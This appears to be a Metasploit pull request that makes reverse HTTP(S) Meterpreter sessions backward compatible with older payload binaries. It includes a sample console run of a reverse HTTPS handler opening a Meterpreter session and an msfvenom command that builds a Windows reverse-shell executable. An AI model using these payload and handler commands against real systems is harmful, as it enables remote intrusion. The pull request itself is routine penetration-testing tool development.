### PR TITLE
Better support old binaries in rev http(s)

### DIFF
--- a/lib/msf/core/payload/windows/stageless_meterpreter.rb
+++ b/lib/msf/core/payload/windows/stageless_meterpreter.rb
@@ -77,7 +77,12 @@ module Payload::Windows::StagelessMeterpreter
     # the URL might not be given, as it might be patched in some other way
     if url
       # Patch the URL using the patcher as this upports both ASCII and WCHAR.
-      Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
+      unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
+        # If the patching failed this could mean that we are somehow
+        # working with outdated binaries, so try to patch with the
+        # old stuff.
+        Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
+      end
     end
 
     # if a block is given then call that with the meterpreter dll

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -48,7 +48,14 @@ class ClientCore < Extension
     request = Packet.create_request('core_enumextcmd')
     request.add_tlv(TLV_TYPE_STRING, extension_name)
 
-    response = self.client.send_packet_wait_response(request, self.client.response_timeout)
+    begin
+      response = self.client.send_packet_wait_response(request, self.client.response_timeout)
+    rescue
+      # In the case where orphaned shells call back with OLD copies of the meterpreter
+      # binaries, we end up with a case where this fails. So here we just return the
+      # empty list of supported commands.
+      return []
+    end
 
     # No response?
     if response.nil?


### PR DESCRIPTION
This PR adds some back-compat changes which were causing some in-field issues. The changes are:
- Patch 256char URL if the 512char one doesn't work.
- Return an empty list in the case where the ext enum fails.

What was happening was that orphaned shells were calling back to a new version of MSF which has the stageless changes baked in, and MSF would ask to enumerate the extensions on the target. In this case, old binaries running on the target that don't support the new core command for extension enumeration were failing in a way that wasn't catered for. This meant that the session wouldn't re-establish correctly and the shell would be unusable.

This fix catches those cases, and adds more code to make sure that if, for some reason, old binaries are used during the set up phase, that things continue to work as expected as well.
## Sample run:

Established a session with old binaries:

```
msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 10.1.10.35:55263 Request received for /OXMh...
[*] 10.1.10.35:55263 Staging connection for target /OXMh received...
[*] Meterpreter session 1 opened (10.1.10.40:8443 -> 10.1.10.35:55263) at 2015-03-24 10:22:58 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > background
[*] Backgrounding session 1...
```

Brutally terminated MSF:

```
msf exploit(handler) > [1]    13604 terminated  ./msfconsole
```

Updated MSF so that it uses new binaries. Then launched MSF again:

```
$ ./msfconsole
[*] Starting the Metasploit Framework console...-
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1426 exploits - 806 auxiliary - 229 post        ]
+ -- --=[ 362 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 10.1.10.35:55348 Request received for /Vrd6_DxcrbTz8IL2wvmiA/...
[*] Incoming orphaned or stageless session Vrd6_DxcrbTz8IL2wvmiA, attaching...
[*] Meterpreter session 1 opened (10.1.10.40:8443 -> 10.1.10.35:55348) at 2015-03-24 10:23:27 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
```

Things carry on as they should have done before.
## Verification
- [x] Build some older binaries (I used Meterpreter commit `bdb681cd45c4c7430d4b82f76ca519f014cdb0a3`) and copy them to `data/meterpreter`, or modify MSF to use an old version of the `meterpreter_bins` gem (such as `0.0.13`).
- [x] Create a staged https payload: `msfvenom -p windows/meterpreter/reverse_https LHOST=... LPORT=... -f exe -o whatever.exe`
- [x] Launch MSF and set up an associated handler/listener to receive the above shell.
- [x] Launch the shell on the target, make sure that it works in MSF
- [x] Terminate MSF keeping the shell running on the target machine.
- [x] Reset MSF so that it uses the most recent binaries.
- [x] Restart MSF and launch the listener again.
- [x] The orphaned shell should correctly reconnect.
